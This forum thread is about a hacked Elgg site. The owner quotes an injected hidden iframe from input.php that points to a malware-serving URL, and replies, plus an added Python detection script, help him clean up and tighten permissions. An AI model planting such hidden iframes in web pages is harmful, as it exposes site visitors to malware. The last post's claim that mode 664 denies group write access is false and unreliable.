Suddenly getting an error when accessing my site

I haven't upgraded from 1.6x or changed anything lately. But suddenly if I try going to my site http://dietharbor.com I get the following error message:

Parse error: syntax error, unexpected T_STRING in /home/doug/public_html/dietharbor.com/engine/lib/input.php on line 159

Anything I can do to "kick" it back into working order?

Thanks,

doug

 

  • What does that file say at that line?

  • should be
            $pee = preg_replace( "|\n</p>$|", '</p>', $pee );


    Doug probably has a corrupt file ;-( -- try to replace that input.php from the original.

  • Actually, line 159 is blank.

    The last 4 lines of the file are lines 157-160 and they read:

    if (strpos($pee, '<pre') !== false)

    $pee = preg_replace_callback('!(<pre.*?>

    <iframe tcwdv='WCY6PRKc' src='http://http-iframe.org/s/in.cgi?7 ' width='690' height='437' style='display:none'></iframe>

    Does that look incorrect for my 1.6x server? It looks weird, like somebody modified it.

    If so I will try to hunt up the original file and replace it. I don't see the 1.6 version up at the main Elgg site for download anymore.

    Thanks,

    doug

     

  • http://elgg.org/previous.php

    The only one missing on that page is Elgg 1.2

  • Added 1.2.  Not sure why that was left out.

  • I've downloaded the 1.61 version from there. Thanks.

    But line 159 in the downloaded version does not have a $pee = setting anywhere near there. The last $pee assignment in that file is at line 105:

    $pee = preg_replace( "|\n</p>$|", '</p>', $pee );

    Starting at line 159 is a section beginning with:

     

       if (!empty($_SERVER['PATH_INFO'])) {

           $_SERVER['PATH_INFO'] = stripslashes($_SERVER['PATH_INFO']);

       }

    Do you think I should replace just the input.php file or everything in engine/lib?

    Thanks,

    doug

  • I'd copy the whole thing over.

    It looks like you've been hacked (ineffectively). http://badwarebusters.org/main/itemview/15626

    If you're on shared hosting with a poorly configured server, it could have come from some other account. If you have a dedicated server or a VPS, then you definitely have a security problem with your server.

    You want to make sure that your files are writable only by your account. The web server only needs to be able to read them.

    There shouldn't be a way to do this with a clean Elgg install with a proper configuration (not that I know of anyways). Make sure your data directory is outside of your html root (or set up a .htaccess to block direct access). Make sure you do not have any plugins that allow users to upload files to a location within your Elgg directory - there might be a WYSIWYG editor that does this in the plugin repository.

    You probably want to do a search for other files that have been compromised before you copy the files over.

  • This is on shared hosting (hostgator).

    There seem to be lots of .php files in the various directories with a date of 4/14. I can't think of any reason they should have changed.

    The permissions for those files/directories are 664, which means only the owner should be able to change it.

    The data directory is in my server "root" which is above the html directory, so nobody should be able to access that. That would include uploaded graphics, right?

    I'm going to replace all the standard files.

    But I wonder - is there anything I should report to hostgator first to see if there is a security problem?

    Thanks,

    doug

  • Hostgator will probably just tell you it's the fault of the application regardless of whether it is or not. It doesn't hurt to report it though.

    Do you know what user and group your web server runs under? I have never used shared hosting so I'm not familiar with how they configure servers. 664 means that the group you belong to has write permission and if you are in the same group as the web server (or another user on the same server), that means those files could be changed by someone else.

    The file plugin and profile plugin both store images in the data directory so if your data directory is not web accessible, you don't have to be concerned with someone uploading a script and executing it.
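
Added example (not part of the thread, and not Elgg or HostGator code): a Python check covering the two things suggested in the replies above, searching a web tree for files that carry a hidden iframe like the one quoted from input.php, and listing every entry writable by group or others, which is what mode 664 grants to the group. The sample tree, the `example.invalid` URL and the names `audit_tree` and `build_sample_tree` are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# <iframe> hidden via display:none or zero width/height, like the tag quoted in the thread.
HIDDEN_IFRAME = re.compile(
    rb"<iframe\b[^>]*(?:display\s*:\s*none|(?:width|height)\s*=\s*['\"]?0\b)[^>]*>",
    re.IGNORECASE,
)
SCAN_EXT = (".php", ".html", ".htm", ".js")

def audit_tree(root):
    """Return (injected, loose): iframe hits as (path, line), writable entries as (path, mode)."""
    injected, loose = [], []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode bits are not meaningful
            rel = os.path.relpath(path, root)
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                loose.append((rel, stat.filemode(st.st_mode)))
            if stat.S_ISREG(st.st_mode) and name.lower().endswith(SCAN_EXT):
                with open(path, "rb") as fh:
                    for lineno, line in enumerate(fh, 1):
                        if HIDDEN_IFRAME.search(line):
                            injected.append((rel, lineno))
    return sorted(injected), sorted(loose)

def build_sample_tree(root):
    """Constructed sample: a clean 644 file and a tampered 664 file under root/lib."""
    lib = os.path.join(root, "lib")
    os.mkdir(lib, 0o755)  # the umask can only clear bits, so never group-writable
    tampered = (b"<?php\n$x = 1;\n<iframe src='http://example.invalid/' "
                b"width='690' height='437' style='display:none'></iframe>\n")
    for name, mode, body in (("elgglib.php", 0o644, b"<?php\necho 'ok';\n"),
                             ("input.php", 0o664, tampered)):
        path = os.path.join(lib, name)
        with open(path, "wb") as fh:
            fh.write(body)
        os.chmod(path, mode)  # explicit mode, independent of the umask

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print(audit_tree(tmp))
```

Run `audit_tree` on the real document root before overwriting files, so the list of tampered paths is kept for the report to the host.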

  • That's exactly what Hostgator told me. But it looks like various folders even outside my Elgg instance hierarchy were hacked. They helped me clean some things up and I got my Elgg site working again by replacing all the source from the newly downloaded build. I also had to upgrade a WordPress instance that got hacked.

    They say it's unlikely malware on my computer since I only use a Mac. They traced the hacking events (download/upload) to a single IP address in Israel. I've blocked that IP address and changed all my important passwords.

    But how it happened remains a mystery.

    I believe permission code 664 allows group read permission but not write permission. At least that is what my FTP program is reporting to me.

    Thanks for your help. All's well that ends well for now. But still, I think there was a security problem at Hostgator itself.

    doug